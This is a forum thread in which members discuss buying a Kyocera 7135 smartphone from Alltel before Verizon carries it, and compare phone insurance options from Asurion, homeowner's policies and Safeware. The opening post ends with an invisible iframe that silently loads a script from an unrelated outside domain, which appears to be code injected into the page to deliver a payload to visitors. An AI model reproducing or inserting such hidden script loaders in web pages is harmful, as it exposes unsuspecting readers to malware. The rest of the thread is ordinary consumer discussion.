+ Reply to Thread
Page 1 of 2 1 2 LastLast

Any disadvantages in getting 7135 now vs. waiting?

Hi All,

Can anyone summarize the technical disadvantages (if any) of ordering a 7135 now (..say from GetConnected.com) and activating with Verizon as opposed to waiting for Verizon to offer the phone themselves? I was specifically wondering if CDMA 1xRTT through Verizon works on the "Alltel" 7135 without issue.

Also just wanted to say thank you to all the people on these forums that help other make informed decisions. It's much appreciated.

- Derek<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

poked back in
    Save activation fees. Hardware flaws MIGHT be worked out(If any), boot up logo and nifty sticker preinstalled on phone.

:cashwalle :cashwalle :cashwalle :cashwalle

Just a thought...

Verizon offers insurance thru the same 3rd party that insures Alltel phones. My rep here in Atlanta said the phone would be completely covered and replaced even if Verizon doesn't carry it yet. So if some hardware problem presents itself and later gets fixed in future Verizon 7135's... you can always pay the $35 deductable and get a new one though the insurance plan.

Mark

Be careful of "insurance" policies on cell phones. Extended warranties and extended "insurance" is usually a rip-off. The "insurance" is through a 3rd-party, and it may cover only theft, and only if you file a police report. Then there is no guarantee when you will receive a replacement phone. Read the fine print of the policy - you might find that the "insurance" is not worth it.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Another question.. if your 7135 is covered, will the insurance company cover the $100+ secure digital cards most 7135 users are likely to have?
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

The insurance offered through Verizon is supposed to even cover you if the phone just isn't working right. It does not have to be stolen. The cost of coverage is $3 or $4 per month (I don't have my monthly statement with me to check for sure), and it carries a $35 deductable for claims.

Mark

The cost is $4.95 per month and I believe the deductable has been increased to $50.00.
    The one who dies with the most toys WINS :-)

I-300 Novice

Disadvantage in Waiting for 7135 Sold Through Verizon

Hi Derek...

I wrestled with your query for a number of weeks...

The disadvantage in waiting...for most of us techno-geeks, its not having the phone to play with TODAY vs. if and whenever Verizon actually delivers it!

I broke down and ordered one through Alltel....should be here tomorrow!
    Ahmed V. Ismail
    A Smartphone Addict

Just went to the Verizon store to check the details. Cost is $3.95 / month with a $50 deductable. Coevrage is up to $1,500 per incident and accessories are covered as well. Insurance provided by Asurion covers loss, damage, theft or product failure -- their web site is: www.asurion.com

disadvantages include:

1) may pay higher now then if you get it from verizon with some sort of contract or promotion

2) verizon can not replace it with a refurb at this time (they dont have any, and likely wont for a while after the initial release either) (they often replace a users phone for free when it breaks regardless if you have insurance or not)

3) conflicting statements from both verizon about whether or not Asurion (verizon's insurance provider) will cover the phone. AFAIK, Asurion has always stated they do not cover it yet, but Verizon is telling people different things depending on who you talk to.

4) there may be bugs on the verizon network / 7135 combination at this time and kyocera is still in development stages so there is no rush to get bugfixes for (non-existant) verizon customers.

5) possible lack of verizon / kyocera support for complex technical issues (configuration or real problems).

Having said that, I am still really tempted to buy the phone now anyways.

I just called Asurian and they said the 7135 would be covered. Verizon store here also said it would be covered. So at least from here in Atlanta, both the Verizon store and Asurion are in agreement. Then I called VZ customer support and they said it's covered and will be replaced by a phone of equal or greater value if 7135 is not in stock. That seemed strange since claims go directly through Asurion.

I don't know what to believe, but it seems that the only real risk is for the time period between when you get the Alltel phone and when VZ actually releases it. And hopefully that won't be too long...

Mark

Originally posted by mhzimmer
    Just went to the Verizon store to check the details. Cost is $3.95 / month with a $50 deductable. Coevrage is up to $1,500 per incident and accessories are covered as well. Insurance provided by Asurion covers loss, damage, theft or product failure -- their web site is: www.asurion.com
    If you have home owners insurance, check with them as well. You may find that they will cover the phone for theft, and failure should be covered by warrantee. This would only leave you out in the cold if the phone gets destroyed through an act of stupidity (remember - phones and washing machines DO NOT mix, and I am out a T68 to prove it).

Originally posted by Token User
    If you have home owners insurance, check with them as well. You may find that they will cover the phone for theft, and failure should be covered by warrantee. This would only leave you out in the cold if the phone gets destroyed through an act of stupidity (remember - phones and washing machines DO NOT mix, and I am out a T68 to prove it).
    It is precisely for such acts of stupidity (which I too have been occasionally inclined towards) that I would want to make sure I had this baby insured.

Also I wouldn't want to risk having my homeowner's policy cancelled over a relatively small claim such as a lost cellphone.

Mark

I agree. There have been recent national news stories about people being "blacklisted" with just one homeowner's claim such that they had great difficulty getting insurance when buying a new home....

I agree. There have been recent national news stories about people being "blacklisted" with just one homeowner's claim such that they had great difficulty getting insurance when buying a new home....
    I agree also. I have a seperate insurance policy that I pay $200/year for that covers up to $10,000 of my computer equipment. It is not a rider on home insurance rather it is just for my computer and electronics equipment. This policy also covers accidental damage with the exception of intentional destruction. I got it from www.safeware.com.

- Derek

...but, do they consider PDAs and/or cellphone/smartphones to be computer equipment? Is there any strings you had to pull or hoops to jump thorugh to get these covered? I'm seriously considering purchasing such coverage for all my geek gear...

http://mikewren.com

Originally posted by MikeW
    ...but, do they consider PDAs and/or cellphone/smartphones to be computer equipment? Is there any strings you had to pull or hoops to jump thorugh to get these covered? I'm seriously considering purchasing such coverage for all my geek gear...
    Yes, they do cover my PDA. I have specifcally asked them about PDA coverage. The cost may be cheaper if you are just insuring the PDA at say $700. I have the $10K amount to cover my laptop, desktop, cell phone, and PDA. Also covered are accessories such as CD-ROM burner and other peripherals as well as software.

I have never had to make a claim so I don't know how they are on the "follow-through" but I have heard good things from other postings on the net.

- Derek

Sounds good. BUT- I just called safeware, and the rep was VERY clear that smartphones are NOT covered- only PDAs with no other function. When asked why, he said they're just used a lot more with the cell function and were too high a risk....

OK. I have just ordered my baby from Kyocera and should be here in two days. I talked to my Verizon rep and he is going to give me a $100 rebate for a two year contract and no activation fee. Insurance is a go as well. I can't believe after reading this site everyday since September that hopefully by Friday I'll have my 7135 thirst quinched!!!!!!:beer :drummer :drink1 :jump